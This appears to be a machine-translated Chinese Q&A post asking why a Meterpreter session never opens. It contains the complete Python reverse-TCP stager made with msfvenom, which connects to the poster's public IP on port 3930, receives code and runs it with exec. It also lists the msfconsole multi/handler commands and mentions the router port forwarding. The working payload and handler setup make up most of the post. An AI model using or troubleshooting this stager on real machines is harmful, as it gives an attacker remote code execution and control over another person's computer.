0
我已经使用msfvenom
创建以下蟒蛇有效载荷:Meterpreter就会无法连接回 - Python的
import socket,struct
s=socket.socket(2,socket.SOCK_STREAM)
s.connect(('MY PUBLIC IP',3930))
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(l)
while len(d)<l:
d+=s.recv(l-len(d))
exec(d,{'s':s})
那么我已经打开了msfconsole
,并做了以下内容:
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
set LHOST 192.168.0.186 (MY LOCAL IP)
set LPORT 3930
exploit
它开始反向TCP处理程序在192.168.0.186:3930上,并启动负载处理程序。但是,当我在另一台计算机上运行该脚本时,等待大约一分钟后,有效负载会超时,并且msfconsole不会注册任何内容。我有端口在路由器上转发3930。我在这里做错了什么?